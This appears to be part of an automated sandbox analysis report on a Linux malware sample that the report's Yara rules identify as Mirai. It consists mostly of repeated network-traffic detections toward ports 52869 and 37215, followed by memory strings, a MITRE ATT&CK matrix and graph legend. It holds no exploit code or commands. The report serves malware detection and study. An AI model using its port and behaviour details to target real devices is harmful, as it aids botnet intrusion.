    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35898 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42372 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42376 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43508 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44562 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47780 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47784 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34042 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35398 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57902 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57912 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52422 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 52422
    Source: unknownNetwork traffic detected: HTTP traffic on port 38942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55744 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53916 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55750 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52782 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52784 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60902 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45084 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45092 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39172 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39192 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60534 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44898 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60902 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53554 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 51514 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47140 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47156 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 47140
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53478 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53484 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 47156
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46150 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46160 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33742 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42822 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39980 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37992 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59660 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59662 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52830 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58584 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35278 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35806 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35284 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60902 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32992 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35278 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55886 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46558 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46594 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32992 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32992 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37472 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37474 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40814 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 48426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34458 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47298 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55142 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 39740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47826 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37702 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53442 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43828 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37710 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36146 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43836 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 43828
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 43836
    Source: unknownNetwork traffic detected: HTTP traffic on port 39030 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32992 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 45740 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59310 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35812 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35036 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35820 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42388 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42392 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35044 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47826 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59678 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34434 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36146 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37188 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49322 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50642 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59310 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53406 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 42500 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41254 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47826 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36146 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60486 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57426 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57092 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38016 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37166 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57106 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37882 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57114 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38022 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41772 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57292 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41778 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 57300 -> 52869
    Source: /tmp/zJk9UEOnQ7 (PID: 5241)Queries kernel information via 'uname':
    Source: zJk9UEOnQ7, 5241.1.00000000d01137f8.00000000d843a670.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
    Source: zJk9UEOnQ7, 5241.1.00000000d01137f8.00000000d843a670.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/sparc
    Source: zJk9UEOnQ7, 5241.1.000000003c5a72e9.00000000de141fdb.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
    Source: zJk9UEOnQ7, 5241.1.000000003c5a72e9.00000000de141fdb.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sparc/tmp/zJk9UEOnQ7SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/zJk9UEOnQ7

    Stealing of Sensitive Information:

    barindex
    Yara detected MiraiShow sources
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Remote Access Functionality:

    barindex
    Yara detected MiraiShow sources
    Source: Yara matchFile source: dump.pcap, type: PCAP

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionFile Deletion1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud

    Malware Configuration

    No configs have been found

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
